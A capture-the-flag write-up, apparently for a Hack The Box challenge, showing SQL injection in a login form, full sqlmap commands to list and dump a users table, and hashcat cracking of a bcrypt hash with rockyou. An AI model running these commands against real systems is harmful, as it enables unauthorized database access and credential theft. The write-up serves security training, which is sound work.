KORP Terminal

Challenge description

Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.

Challenge Overview

This challenge presents a web application with a login interface. Users must input a username and password. The goal is to identify valid credentials to log in and retrieve the flag.

Enumeration

After testing common credentials like admin:admin or guest:guest, no successful login was achieved. A closer inspection of the request using tools like Burp Suite revealed no immediate clues. This prompted an attempt to test for vulnerabilities like SQL Injection.

Testing for SQL Injection

Using the payload below in the username field revealed a SQL error, confirming the application is vulnerable to SQL Injection:

admin'

The server response provided the following error message:

{
    "error": {
        "message": [
            "1064",
            "1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''admin''' at line 1",
            "42000"
        ],
        "type": "ProgrammingError"
    }
}

The error message clearly indicates a syntax issue caused by the unescaped input, confirming that the backend query is vulnerable.

Exploitation

To exploit this vulnerability, we used sqlmap, a powerful automated SQL Injection tool. Since the error revealed the backend is running MariaDB, we specified this database management system in our command.

Step 1: Listing Database Tables

The following command was used to retrieve the names of all tables:

sqlmap -u "http://<challenge-ip>:<challenge-port>" --data="username=admin&password=admin" -p username --ignore-code 401 --dbms=MariaDB --tables

Command Breakdown

• -u: Target URL.
• --data: Data sent in the POST request.
• -p: Parameter to test (in this case, username).
• --ignore-code: Ignore HTTP status codes (e.g., 401 Unauthorized).
• --dbms: Specify the database management system (MariaDB).
• --tables: Retrieve all table names.

Output:

Sqlmap revealed a database named korp_terminal with a table named users.

Step 2: Dumping the users Table

To extract the contents of the users table, the following command was used:

sqlmap -u "http://94.237.61.84:38028" --data="username=admin&password=admin" -p username --ignore-code 401 --dbms=MariaDB -D korp_terminal -T users --dump

Command Breakdown:

• -D: Specify the database to target (korp_terminal).
• -T: Specify the table to dump (users).
• --dump: Dump all rows from the specified table.

Output:

The dump revealed the username and password fields. The password field was hashed using bcrypt.

Cracking the Password Hash

Identifying the Hash Type

By comparing the extracted hash with examples from the Hashcat Hash Examples page, it was identified as bcrypt (Hashcat mode 3200).

Cracking the Hash with hashcat

To crack the bcrypt hash, the following command was used:

hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

Command Breakdown

• -m 3200: Specify the hash type (bcrypt).
• hash.txt: Input file containing the hash.
• /usr/share/wordlists/rockyou.txt: Wordlist for brute force.

Output:

$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123

The cracked password for the admin user was password123.

Logging In

Using the credentials:

• Username: admin
• Password: password123

We successfully logged into the application and retrieved the flag:

HTB{f4k3_fl4g}

KORP Terminal has been Pwned!

References

• SQLmap - Hacktricks
• Hashcat Wiki - Example hashes